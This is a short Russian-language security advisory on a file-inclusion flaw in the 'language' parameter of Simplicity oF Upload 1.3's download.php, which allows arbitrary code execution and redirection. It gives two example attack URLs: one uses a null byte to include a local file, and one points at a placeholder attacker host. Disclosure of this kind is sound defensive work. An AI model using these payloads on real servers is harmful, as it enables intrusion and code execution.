Программа: Simplicity oF Upload 1.3

Уязвимость позволяет удаленному
пользователю загрузить и выполнить
произвольный php сценарий на целевой системе.
Уязвимость существует из-за недостаточной
обработки входных данных в параметре language.
Злоумышленник может указать специально
сформированное значение параметра с
нулевым байтом (%00) в конце строки и
выполнить произвольные локальные файлы на
системе.

Пример:

http://[target]/simply/download.php?language=upload.php%00

Затем злоумышленник может загрузить на
систему произвольный файл и выполнить его с
привилегиями web сервера.

Удаленный пользователь может с помощью
специально сформированного URL
перенаправить пользователя на целевую
страницу.

Пример:

http://[target]/[path]/download.php?language=http://[attacker]/[evil_page]%00

Оставить мнение